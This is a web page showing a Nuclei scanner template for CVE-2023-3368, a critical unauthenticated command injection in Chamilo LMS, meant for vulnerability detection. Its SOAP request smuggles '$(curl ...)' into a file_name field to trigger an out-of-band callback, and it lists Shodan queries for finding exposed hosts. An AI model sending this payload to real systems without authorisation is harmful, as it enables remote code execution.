Chamilo LMS <= v1.11.20 Unauthenticated Command Injection

ID: CVE-2023-3368

Severity: critical

Author: dwisiswant0

Tags: cve2023,cve,chamilo,unauth,cmd,rce

Description

Command injection in /main/webservices/additional_webservices.phpin Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtainremote code execution via improper neutralisation of special characters.

YAML Source

id: CVE-2023-3368

info:
  name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
  author: dwisiswant0
  severity: critical
  description: |
    Command injection in `/main/webservices/additional_webservices.php`
    in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain
    remote code execution via improper neutralisation of special characters.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3368
    - https://starlabs.sg/advisories/23/23-3368/
    - https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368
    - https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657a
    - https://https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48b
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3368
    cwe-id: CWE-78
    epss-score: 0.93283
    epss-percentile: 0.99063
    cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: chamilo
    product: chamilo
    shodan-query:
      - http.component:"Chamilo"
      - http.component:"chamilo"
      - cpe:"cpe:2.3:a:chamilo:chamilo"
  tags: cve2023,cve,chamilo,unauth,cmd,rce

http:
  - method: POST
    path:
      - "{{BaseURL}}/main/webservices/additional_webservices.php"

    headers:
      Content-Type: application/xml

    body: |
      <?xml version="1.0" encoding="UTF-8"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{BaseURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <SOAP-ENV:Body>
          <ns1:wsConvertPpt>
            <param0 xsi:type="ns2:Map">
              <item>
                <key xsi:type="xsd:string">file_data</key>
                <value xsi:type="xsd:string"></value>
              </item>
              <item>
                <key xsi:type="xsd:string">file_name</key>
                <value xsi:type="xsd:string">$(curl http://{{interactsh-url}}/)</value>
              </item>
              <item>
                <key xsi:type="xsd:string">service_ppt2lp_size</key>
                <value xsi:type="xsd:string">720x540</value>
              </item>
            </param0>
          </ns1:wsConvertPpt>
        </SOAP-ENV:Body>
      </SOAP-ENV:Envelope>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "wsConvertPptResponse"
        part: body

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022006ed09a286c9f28c6954946bd67ae23f7469612f9d44b2b8f45eacc12bdce81d022100b034cbe19447bcb69b0469d4d13537614a7f4b52e5cbf88135a63f6778544784:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-3368.yaml"

View on Github